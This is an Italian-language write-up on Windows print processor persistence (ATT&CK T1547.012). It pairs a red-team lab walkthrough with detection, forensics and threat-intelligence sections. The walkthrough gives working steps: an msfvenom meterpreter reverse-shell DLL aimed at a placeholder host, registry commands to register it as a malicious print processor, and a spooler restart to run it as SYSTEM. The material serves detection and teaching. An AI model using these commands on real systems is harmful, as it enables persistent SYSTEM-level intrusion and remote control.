Persistenza via Print Processor: Print Processors (T1547.012)

L'obiettivo in laboratorio è dimostrare che un attaccante con accesso amministrativo locale può installare un print processor malevolo e ottenere esecuzione SYSTEM-level al riavvio dello spooler. L'intero esercizio si articola in tre fasi: preparazione del payload, registrazione del processor e trigger dell'esecuzione.

Fase 1 — Identificare la directory target. Il payload deve trovarsi nella cartella dei print processor di sistema. Da PowerShell con privilegi elevati, puoi individuarla con un approccio pratico:

Get-ChildItem "C:\Windows\System32\spool\prtprocs\x64"

Nella maggior parte delle installazioni Windows x64 il percorso è C:\Windows\System32\spool\prtprocs\x64\. Qui risiedono i print processor legittimi come winprint.dll. Copia il tuo payload DLL in questa directory — durante un red team engagement, una DLL compilata con msfvenom (open source, parte di Metasploit Framework) è sufficiente per il PoC:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORTA> -f dll -o evilprint.dll

Copia poi il file nella directory target:

*copy evilprint.dll C:\Windows\System32\spool\prtprocs\x64*

Fase 2 — Registrare il print processor via Registry. Questa è la tecnica usata da Earth Lusca nella sua campagna documentata. Da prompt amministrativo:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\EvilProc" /v Driver /t REG_SZ /d "evilprint.dll" /f

In alternativa, da PowerShell:

New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\EvilProc" -Name "Driver" -Value "evilprint.dll" -PropertyType String

Fase 3 — Trigger. Il processor viene caricato al riavvio del servizio spooler. Per forzarlo senza reboot completo:

Restart-Service Spooler -Force

Dopo il restart, verifica che spoolsv.exe abbia caricato la DLL usando Process Explorer (gratuito, Sysinternals) o con Sysmon (gratuito, Sysinternals) configurato per loggare EventID 7 (Image Loaded). Per la validazione di cleanup, rimuovi la chiave Registry e la DLL dal percorso.

Un'alternativa più sofisticata prevede l'uso diretto della API AddPrintProcessor tramite un tool C/C++ custom. Il repository SharpPrintNightmare (open source) contiene codice di riferimento per interagire con le API di stampa di Windows, utile come base per sviluppare il proprio PoC.

Il monitoraggio di questa tecnica ruota attorno a tre pilastri: modifiche Registry, scrittura di DLL nella directory dei print processor e caricamento moduli da parte di spoolsv.exe. La detection strategy documentata (DET0026) prescrive di correlare questi tre eventi in una finestra temporale ristretta, tipicamente 5 minuti attorno al riavvio dello spooler o al boot di sistema.

Log source primario: Sysmon. La configurazione richiede tre Event ID chiave. L'EventID 13 (RegistryEvent — Value Set) intercetta scritture sotto il percorso HKLM\SYSTEM\*ControlSet*\Control\Print\Environments\*\Print Processors\*. L'EventID 11 (FileCreate) rileva la creazione di file DLL nella directory C:\Windows\System32\spool\prtprocs\x64\. L'EventID 7 (Image Loaded) traccia il caricamento di DLL da parte di spoolsv.exe.

La regola di correlazione efficace prevede di combinare questi tre segnali: prima la modifica Registry, poi la comparsa del file DLL, infine il caricamento del modulo da parte dello spooler. In SIEM, una regola di tipo "sequence" funziona bene:

• Evento A: EventID 13 con TargetObject contenente Print Processors e valore che punta a una DLL
• Evento B: EventID 11 con TargetFilename sotto spool\prtprocs
• Evento C: EventID 7 con Image uguale a spoolsv.exe e ImageLoaded sotto spool\prtprocs

Tuning per ridurre i falsi positivi. Il primo accorgimento è costruire una allowlist delle DLL print processor legittime presenti nel proprio ambiente — tipicamente winprint.dll e pochi driver di stampante. Qualsiasi DLL non in lista che appare nel percorso dei print processor merita investigazione immediata.

Il secondo filtro riguarda la validazione della firma digitale: le DLL legittime sono firmate da Microsoft o dal vendor della stampante. L'EventID 7 di Sysmon include i campi Signature e SignatureStatus — una DLL non firmata o con firma invalida caricata da spoolsv.exe è un indicatore ad alta confidenza.

Monitora anche i restart anomali del servizio spooler tramite EventID 7036 del System Event Log (cambio stato del servizio) o EventID 1 di Sysmon (processo creato) per nuove istanze di spoolsv.exe. Un restart dello spooler non correlato a installazione di stampanti o aggiornamenti è sospetto e può indicare il trigger della persistenza.

La mitigazione preventiva documentata è User Account Management (M1018): disabilitare il privilegio SeLoadDriverPrivilege per tutti gli account che non ne hanno strettamente necessità riduce drasticamente la superficie d'attacco, impedendo la registrazione tramite API AddPrintProcessor.

L'analisi forense di un print processor malevolo produce una timeline che attraversa tre domini di artefatti: Registry, file system e log di sistema. Ogni dominio contribuisce un tassello alla ricostruzione temporale dell'intrusione.

Registry — il punto di ancoraggio. La chiave critica risiede in HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\. Ogni sotto-chiave sconosciuta con un valore Driver che punta a una DLL non standard è potenzialmente malevola. Earth Lusca ha usato il nome UDPrint con driver spool.dll. PipeMon ha registrato la propria chiave sotto lo stesso ramo.

Per l'analisi offline, carica l'hive SYSTEM con Registry Explorer (open source, Eric Zimmerman) o RegRipper (open source). Il timestamp dell'ultima modifica della chiave fornisce il momento dell'installazione del processor. Confronta questo timestamp con la timeline complessiva per stabilire la sequenza: l'attaccante ha prima ottenuto l'accesso, poi escalato i privilegi, infine installato la persistenza.

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors" /s

Questo comando, eseguito su un sistema live o su un hive montato, elenca tutti i print processor registrati e le rispettive DLL.

File system — il payload. La DLL malevola risiede nella directory C:\Windows\System32\spool\prtprocs\x64\. Gelsemium utilizza il nome winprint.dll in questo percorso — un tentativo di mimetizzarsi con il print processor legittimo omonimo. Verifica l'hash SHA-256 di ogni DLL presente nella directory e confrontalo con il database di VirusTotal (freemium). I timestamp MACB (Modified, Accessed, Changed, Born) del file, estratti con MFTECmd (open source, Eric Zimmerman) dalla $MFT, sono fondamentali per ancorare temporalmente il deploy del payload.

Analizza anche i metadati PE della DLL sospetta con PEStudio (freemium) o pefile (open source, Python): una DLL che si spaccia per print processor ma non esporta le funzioni attese (OpenPrintProcessor, PrintDocumentOnPrintProcessor, etc.) è un forte indicatore di compromissione.

Log e timeline integrata. I log Sysmon, se disponibili, forniscono la catena EventID 13 → EventID 11 → EventID 7 descritta nella sezione SOC. In assenza di Sysmon, il Windows Event Log di sistema (EventID 7036) registra i restart del servizio Spooler. Correla questi restart con il timestamp di creazione della chiave Registry e della DLL per determinare quando l'avversario ha attivato la persistenza.

Per la timeline consolidata, strumenti come KAPE (open source, Eric Zimmerman) consentono di acquisire rapidamente tutti gli artefatti rilevanti — hive SYSTEM, directory spool, log Sysmon ed eventi di sistema — e di elaborarli in un formato timeline unificato.

Il panorama threat intelligence per questa tecnica presenta un profilo ristretto ma significativo: un gruppo APT e due famiglie malware che condividono un pattern operativo comune centrato sull'abuso del servizio Print Spooler.

Earth Lusca (G1006) è un gruppo con legami nell'ecosistema cyber cinese, attivo contro organizzazioni governative, media e istituzioni accademiche in diverse regioni. La loro implementazione è diretta: registrano una chiave Registry sotto Print Processors con il nome UDPrint e driver spool.dll. La scelta del nome "spool.dll" è intenzionale — si mimetizza con i componenti legittimi del servizio spooler, rendendo meno probabile una detection visiva durante un triage rapido. Questo approccio riflette un livello di sofisticazione intermedio: sufficiente a evadere controlli superficiali, ma rilevabile con monitoraggio Registry strutturato.

Gelsemium (S0666) adotta una strategia di mimetizzazione più aggressiva, depositando il payload come winprint.dll nella directory dei print processor. Questo nome collide deliberatamente con il print processor predefinito di Windows, complicando l'analisi forense perché un operatore potrebbe scambiarlo per il componente legittimo. Il malware sfrutta il caricamento automatico da parte di spoolsv.exe senza necessità di manipolazione Registry esplicita del percorso — una variante che riduce le tracce lasciate.

PipeMon (S0501), attribuito a operatori con focus su target nel settore gaming e tecnologico in Asia orientale, modifica direttamente la chiave Registry sotto CurrentControlSet per registrarsi come print processor. L'installer di PipeMon gestisce autonomamente la registrazione, suggerendo un livello di automazione nella catena di deployment.

Il pattern convergente è chiaro: tutti e tre gli attori operano nell'ecosistema Asia-Pacifico e scelgono il print processor come meccanismo di persistenza per la combinazione di esecuzione SYSTEM-level, sopravvivenza ai reboot e bassa visibilità. Il servizio spooler è abilitato di default sulla maggior parte dei sistemi Windows, anche server, e riceve attenzione di monitoraggio inferiore rispetto a meccanismi di persistenza più noti come le Run key o i servizi.

Per il threat modeling proattivo, organizzazioni nel settore governativo, accademico o tecnologico con esposizione verso attori dell'area Asia-Pacifico dovrebbero considerare la disabilitazione del servizio Print Spooler su tutti i server dove la stampa non è necessaria — una misura che elimina completamente il vettore.

Framework MITRE ATT&CK v16 — tecnica T1547.012 (Print Processors), tattiche TA0003, TA0004. Gruppi: G1006. Software: S0666, S0501. Mitigazione: M1018. Detection: DET0026, AN0074. Integrato con conoscenza professionale per tool e procedure operative.